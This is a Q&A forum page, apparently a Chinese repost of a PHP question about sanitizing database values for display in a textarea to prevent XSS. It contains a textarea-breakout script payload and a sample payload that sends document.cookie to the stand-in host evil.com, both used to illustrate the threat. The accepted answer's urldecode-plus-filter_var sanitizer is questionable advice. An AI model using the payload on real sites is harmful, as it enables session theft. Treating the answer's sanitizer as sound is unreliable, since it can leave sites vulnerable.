dtlygweb2017 2012-04-22 17:42
浏览 215
已采纳

从XSS消毒输出到Textarea

What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?

For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.

When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in 

</textarea><script type='text/javascript'> Malicious Code</script><textarea>

) and cause problems.

Thanks!

  • 写回答

3条回答 默认 最新

  • dousha2020 2012-04-22 19:12
    关注

    I think i would prefer a combo of filter_var and url_decode if you want to use a pure simple php Solution

    Reason

    Imagine an impute like this 

    $maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";

    If i use strip_tags

    var_dump(strip_tags($maliciousCode));

    Output

    string 'document.write("' (length=16)

    if i use htmlspecialchars 

    var_dump(htmlspecialchars($maliciousCode));

    Output

    string '&lt;script&gt;document.write(&quot;&lt;img src='http://evil.com/?cookies='&quot;+document.cookie+&quot;' style='display:none;' /&gt;&quot;);&lt;/script&gt; I love PHP' (length=166)

    My Choice

    function cleanData($str) {
    $str = urldecode ($str );
    $str = filter_var($str, FILTER_SANITIZE_STRING);
    $str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
    return $str ;
}

$input = cleanData ( $maliciousCode );
var_dump($input);

    Output

     string 'document.write(&#38;#34;&#38;#34;); I love PHP' (length=46)

    If form is using GET instead of POST some can till escape if it is url encoded , you are able to get a minimal information and make sure the final text is harmless

    The are also enough class online to help you do filter see

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?

  • XSS消毒输出Textarea css php xss
    2012-04-22 17:42
    回答 3 已采纳 I think i would prefer a combo of filter_var and url_decode if you want to use a pure simple php S
  • 为什么我这个xss不运行 javascript xss 前端
    2022-09-19 20:45
    回答 3 已采纳 设置dom的innerHTML,里面的js代码并不会执行,虽然是蓝色的,vue的xss注入一般通过v-html绑定富文本,但是包含script不会执行改为dom事件,比如img的onerror事件来自
  • 关于论坛系统的防止XSS攻击的问题 vue.js xss 前端
    2023-04-19 18:41
    回答 3 已采纳 首先,XSS攻击(Cross-Site Scripting)是一种常见的Web安全漏洞,攻击者利用网站没有对用户提交的数据进行充分过滤或转义的漏洞,在网页中注入恶意脚本,以达到攻击目的。 在前端方面,
  • js 对输入内容做净化处理 防止 xss攻击
    2019-11-04 15:37
    tianmeng1999的博客 XSS攻击是什么 通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。 盗用cookie,获取敏感信息等 防止 xxs攻击 当你点击获取 textarea 的内容插入 dom结构时 textarea 的内容包含...
  • 这个消毒是否有任何XSS泄漏 php xss
    2014-01-12 14:38
    回答 1 已采纳 From a security standpoint, there is no need to use your sanitize function as long as you escape /
  • jquery dom型xss手工利用 javascript jquery xss 有问必答
    2022-06-07 17:34
    回答 2 已采纳 贴出来的代码没看到具体html操作,notice这个扩展应该用到相关的html方法,可能存在xss注入漏洞,检查notice扩展的代码,相关参考 jquery html方
  • 如何设计一个xss过滤器 java xss
    2023-03-06 17:25
    回答 2 已采纳 满足要求的XSS过滤器,可以采取以下步骤: 首先,定义一个过滤器类,该类包含一个过滤方法,用于接受需要过滤的输入字符串,然后返回已过滤的字符串。在过滤方法中,首先将输入字符串转换为小写字母,以防止大小
  • 网络安全必学知识点之XSS漏洞
    2021-09-23 19:19
    kali_Ma的博客 这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户...
  • 关于X-FORWARDED-FOR注入XSS攻击的问题 web安全 xss 有问必答
    2021-12-27 15:24
    回答 1 已采纳 这种只能手工测试,或者你用绿盟的极光试试
  • 关于strust2框架处理xss问题 xss
    2018-10-18 09:03
    回答 1 已采纳 正常情况不应该,应该过滤器肯定在controller之前执行,你是不是没有从新set,或者新增个数值,set进去,controller去获取,正常情况下,应该是没问题的,简单得做法,做配置读取档,简单
  • 在用户输入后输出SESSION - 防止xss php xss
    2012-04-11 22:15
    回答 2 已采纳 The function htmlspecialchars does not encode single quotation(') by default, if your user name ec
  • WEB漏洞-XSS跨站之原理分类
    2021-08-13 16:27
    硫酸超的博客 产生于前端代码和js代码中,XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击,攻击者在可信的网页中嵌入...
  • 想请教跨浏览器打开检查内容 xhtml xss 前端
    2023-02-21 02:50
    回答 1 已采纳 基于Monster 组和GPT的调写:打开谷歌浏览器,进入需要查看的页面。 在页面上右键单击,选择“检查”或者使用快捷键“Ctrl+Shift+I”打开开发者工具。 在开发者工具的顶部,有一个选项卡可
  • xss漏洞学习小结,详不详细你说了算
    2021-10-09 14:58
    白面安全猿的博客 这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户...
  • 最全CTF Web题思路总结(更新ing)
    2022-02-12 23:37
    yjprolus的博客 ` 的输出结果都为 ctfshownb #### parse_str() 函数会将传入的第一个参数设置成变量,如果设置了第二参数,则会将第一个参数的变量以数组元素的形式存入到这个数组。 ```php if(isset($_POST['v1'])){ $v1 = $_POST...
  • 没有解决我的问题, 去提问

悬赏问题

  • ¥15 Excel发现不可读取的内容
  • ¥15 UE5#if WITH_EDITOR导致打包的功能不可用
  • ¥15 关于#stm32#的问题:CANOpen的PDO同步传输问题
  • ¥20 yolov5自定义Prune报错,如何解决?
  • ¥15 电磁场的matlab仿真
  • ¥15 mars2d在vue3中的引入问题
  • ¥50 h5唤醒支付宝并跳转至向小荷包转账界面
  • ¥15 算法题:数的划分,用记忆化DFS做WA求调
  • ¥15 chatglm-6b应用到django项目中,模型加载失败
  • ¥15 CreateBitmapFromWicBitmap内存释放问题。